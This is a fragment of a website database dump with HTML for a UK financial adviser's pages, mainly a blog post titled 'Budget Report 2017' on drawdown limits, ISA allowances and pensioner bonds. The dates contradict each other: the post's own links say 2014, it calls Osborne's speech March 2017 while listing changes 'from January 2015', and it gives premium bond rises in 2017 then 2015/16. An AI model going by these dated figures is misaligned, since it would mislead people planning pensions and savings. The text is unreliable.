#000000;\"><b>#4</b> Is Income Drawdown better:</span></p>&#13;\n<p><span style=\"color: #000000;\"> It\'s certainly gives you more flexibility but be aware of the risks.</span></p>&#13;\n<p><span style=\"color: #000000;\">#5 At retirement</span></p>&#13;\n<p>If you have a money purchase scheme at some point you will need to choose between them.</p>&#13;\n</div>&#13;\n		</div><div id=\"text-20\" class=\"widget widget_text\">			<div class=\"textwidget\"><p><br/></p>&#13;\n</div>&#13;\n		</div><div id=\"text-21\" class=\"widget widget_text\">			<div class=\"textwidget\"/>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../whole-life-advisers-tale/\">Whole of life insurance – an advisers tale</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer></div>&#13;\n	&#13;\n			<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/></body>','&#13;\n	Which is Better Pension Drawdown or Annuity?','Discover more about pension drawdown and annuities and what factors to consider when choosing which is best for your retirement','publish','closed','closed','','which-is-better-pension-drawdown-or-annuity','','','2017-09-21 16:34:27','2017-09-21 16:34:27','',0,'http://www.equalitywalk.org.uk/which-is-better-pension-drawdown-or-annuity',0,'page','',0),(56,1,'2017-09-21 16:34:27','2017-09-21 16:34:27','<body class=\"single single-post postid-7938 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Budget Report 2017										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/wealth-management/\" title=\"Wealth Management\">Wealth Management</a></li><li>Budget Report 2017</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		<div id=\"content\" class=\"full-width\" style=\"width:100%\">&#13;\n										<div id=\"post-7938\" class=\"post-7938 post type-post status-publish format-standard has-post-thumbnail hentry category-wealth-management post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">Budget Report 2017</span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"wpb_row vc_row-fluid\"> &#13;\n	<div class=\"vc_span3 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<h2><a href=\"#\"/></h2>&#13;\n<h2/>&#13;\n<h2>Fast Facts</h2>&#13;\n<p>From 27 March:<br/><span style=\"line-height: 1.5em;\">The capped drawdown Government Actuary’s Department (GAD) limit will be increased from </span><strong style=\"line-height: 1.5em;\">120% to 150%<span style=\"line-height: 1.5em;\">.</span></strong></p>&#13;\n<p>The minimum income requirement for accessing flexible drawdown will be reduced from £20,000 to £12,000. </p>&#13;\n<p>The amount for small individual pension pots that can be taken as a lump sum (regardless of total pension wealth) will increase from £2,000 to £10,000, and individuals will be able to take 3 individual pension pots as lump sums (previously only 2 allowed).</p>&#13;\n<p>The total pension wealth that people can have before they are no longer entitled to receive lump sums under trivial commutation rules will increase from £18,000 to £30,000.</p>&#13;\n<p>From 1 July 2017:</p>&#13;\n<p>The ISA limit will be increased to £15,000.</p>&#13;\n<p>From January 2015:<br/>&#13;\nNational Savings &amp; Investments will be offering a 1yr pensioner bond that is expected to pay 2.8% and a 3yr pensioner bond that will be paying 4%. Maximum investment £10,000.</p>&#13;\n<p> From 6 April 2015:<br/>&#13;\n Unlimited access to pension funds from age 55 with 25% tax free and the remainder at marginal rates of income tax.</p>&#13;\n<p>Age 55 rules proposed to be linked to State Pension Age by introducing the minimum age as SPA minus 10 years.</p>&#13;\n<p>All individuals with defined contribution pension pots are offered free and impartial face-to-face guidance at the point of retirement and will make available up to £20 million in the next 2 years to develop this initiative.</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span9 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<h1>If Carlsberg Were to do Budgets it Would Probably Look Something Like this!</h1>&#13;\n<h2> “A Budget for Makers, Do-ers and (above all) Savers.”</h2>&#13;\n<p><span style=\"font-size: 1.5em; line-height: 1.5em;\"><div class=\"clearboth\"/><div class=\"demo-sep sep-single\" style=\"margin-top:20px;margin-bottom:20px;\"/></span></p>&#13;\n<p>When George Osborne stood up to deliver his Budget speech in March 2017 the UK was teetering on the brink of a triple-dip recession. A year on, the economic picture looked radically different.</p>&#13;\n<p/>&#13;\n<p>Growth forecasts were being continually revised upwards and Osborne was able to confirm in his speech that the Office for Budget Responsibility (OBR) expected growth for 2017 to be 2.7% – meaning that the UK was now <span style=\"text-decoration: underline;\">growing faster</span> than all its major competitors.</p>&#13;\n<p/>&#13;\n<p>Not that anyone expected any giveaways in the Budget. Despite the fact that the Conservatives were trailing UKIP in the polls for the European elections and Labour in the general election polls, Osborne was playing the ‘economic competence’ card.</p>&#13;\n<p/>&#13;\n<p>He was the person best suited to guide Britain’s gradual recovery and as he rose to speak at 12:33pm, all the pundits expected him to confirm that. It would be a ‘steady as you go’ Budget, <span style=\"text-decoration: underline;\">with no major surprises.</span></p>&#13;\n<p/>&#13;\n<p>How wrong they were. The Chancellor leapt to his feet, announced that it would be a Budget for “makers, do-ers and savers” and spent the next 55 minutes reeling off a list of surprises.</p>&#13;\n<p/>&#13;\n<p>As far as our clients are concerned, the big news came with a radical overhaul of pensions – “the biggest changes since 1921” according to the Chancellor – and major alterations to the rules governing Individual Savings Accounts.</p>&#13;\n<p/>&#13;\n<p>We’ve detailed the major changes below, but we cannot stress too highly that the changes introduced by the Chancellor were radical and far-reaching and will have implications for the financial planning of most of our clients.</p>&#13;\n<p>If you have any questions at all on the Budget, or you’re unsure how the changes will affect you, don’t hesitate to get in touch with us. <a title=\"Get in Touch\" href=\"../contact-us/\">Click here</a></p>&#13;\n<p/>&#13;\n<h1 style=\"text-align: center;\"><b>Pensions</b></h1>&#13;\n<p/>&#13;\n<p>The key words when George Osborne spoke about pensions were “trust” and “flexibility.” He will be consulting on his proposed changes, but there is no reason to suppose they won’t go ahead, and they could be in force as early as next year.</p>&#13;\n<p/>&#13;\n<p>The changes will give those with a pension more flexibility and choice than they’ve ever had before – but the changes will also bring with them a need for advice, both when the pension is taken and as income continues to be taken from the pension.</p>&#13;\n<p/>&#13;\n<ul><li>&#13;\n<p>If the proposed changes go ahead, then anyone of pension age will be able to draw as much (or as little) from their pension pot as they so choose.</p>&#13;\n</li>&#13;\n</ul><ul><li>&#13;\n<p>If they choose to draw more than 25% of the fund then the first 25% will be tax free, with the balance taxed as income in the year it is taken.</p>&#13;\n</li>&#13;\n</ul><p/>&#13;\n<p>This is a clear indication of George Osborne’s intention to trust savers: despite one Government minister glibly commenting, <em>“We don’t care if they take it all and buy a Lamborghini”</em> the clear expectation is that pensioners will behave responsibly – but enjoy the flexibility to take income as their need for it dictates.</p>&#13;\n<p/>&#13;\n<p>Pensions have had a bad press of late. <em>“Why should I save in a pension when the annuity rates are so low”</em> is a phrase we’ve heard countless times in our offices. With these proposed changes we believe that savers will “re-discover” pensions – that they’ll once again be seen as an attractive savings vehicle.</p>&#13;\n<p/>&#13;\n<h2><i>Boost for Drawdown users</i></h2>&#13;\n<p>As above, the more far reaching changes are subject to consultation. There were however, two immediate pieces of good news for drawdown users which are effective almost immediately:</p>&#13;\n<ul><li>&#13;\n<p>Capped income drawdown – the limit is increased from 120% of GAD to 150% for income years starting after March 26<sup>th.</sup></p>&#13;\n</li>&#13;\n</ul><ul><li>&#13;\n<p>Flexible income drawdown – the yearly secured income needed to meet the ‘minimum income requirement’ is cut from £20,000 to £12,000 for anyone applying to start flexible drawdown after March 26<sup>th</sup></p>&#13;\n</li>&#13;\n</ul><p/>&#13;\n<p>These changes give drawdown users much more flexibility – but again, they have financial planning implications so if you have any questions, ask us by. <a title=\"Contact Us\" href=\"../contact-us/\">Just Clicking Here</a></p>&#13;\n<p><i style=\"font-size: 1.17em; line-height: 1.5em;\">Other pensions changes</i></p>&#13;\n<p>There were several other pensions changes designed to give people more control and more flexibility. The triviality limit (which allows people with small pension pots to take all the money as cash) has been extended from £18,000 to £30,000, and the Chancellor is also consulting on the 55% death benefits charge which previously applied to drawdown.</p>&#13;\n<p>It was always felt that this high rate of tax was unfair and the Government have recognised the need to have a tax system where pension savers are not penalised by only taking what they need from their pension fund.</p>&#13;\n<p> </p>&#13;\n<h1 style=\"text-align: center;\"><b>The Changes to Savings</b></h1>&#13;\n<p/>&#13;\n<p><i>ISAs – or NISAs as we must learn to call them…</i><i> </i></p>&#13;\n<p>Again catching everyone by surprise, the Chancellor introduced a major overhaul of the rules governing Individual Savings Accounts (ISAs).</p>&#13;\n<p>The annual limit is increased from £11,520 to £15,000 and there will no longer be a lower cap on the amount that can be saved in a cash ISA – allowing clients to save up to £15,000 in any combination between a cash ISA and a stocks &amp; shares ISA.</p>&#13;\n<p>…Except it won’t be an ISA any more: the new product will be known as a New ISA. Much NISA.</p>&#13;\n<p>The limit that can be saved in a Junior ISA and the Child Trust Fund is also going up, from £3,840 to £4,000.</p>&#13;\n<p>All these changes come into effect from July 1<sup>st</sup> and are clearly intended – again – to give savers more choice and control. But in the current climate of low interest rates the temptation to opt for the security of cash ISA may not be best for all savers.</p>&#13;\n<h2/>&#13;\n<h1 style=\"text-align: center;\"><b>National Savings</b></h1>&#13;\n<p/>&#13;\n<p>George Osborne also boosted National Savings, with the limit on what can be invested in premium bonds going from £30,000 to £40,000 in June 2017 and to £50,000 in 2015/16.</p>&#13;\n<p>He also introduced two Pensioner Bonds, with an indicative rate of 2.8% gross/AER for the one year bond and 4% gross/AER for the three year bond. How attractive these will be remains to be seen as there is a £10,000 limit for each bond and the interest will be taxable.</p>&#13;\n<h2><b>Conclusions</b></h2>&#13;\n<p>All in all it was a dramatic Budget – but one which we welcome.</p>&#13;\n<p>There is no doubt at all the people in receipt of pension income need flexibility. Largely dependent on your health, your need for income in retirement can vary significantly from year to year: the proposed changes will address this.</p>&#13;\n<p>However, there will be a need for more independent advice – and as we suggested above, that advice will need to be ongoing throughout the life of the pension.</p>&#13;\n<p>George Osborne’s changes to pensions and savings are significant and likely to impact on most people’s financial planning. We’re happy to discuss how they will affect you.</p>&#13;\n<p>If you’d like to discuss what the effect is on your pensions and savings, then just drop me an email to paul.reynolds@equalitywalk.org.uk or complete the Contact Form <span style=\"color: #0000ff;\"><a href=\"../contact-us/\"><span style=\"color: #0000ff;\">HERE.</span></a></span><span style=\"font-size: 14px; line-height: 1.5em;\"> </span></p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span><span class=\"sep\">|</span>Categories: <a href=\"../category/wealth-management/\" title=\"View all posts in Wealth Management\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../budget-report-2014/\" title=\"Comment on Budget Report 2014\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/budget-report-2014/&amp;p[title]=Budget%20Report%202014\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=Budget+Report+2014%20http://www.equalitywalk.org.uk/budget-report-2014/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/budget-report-2014/&amp;title=Budget%20Report%202014\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/budget-report-2014/&amp;title=Budget%20Report%202014\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a 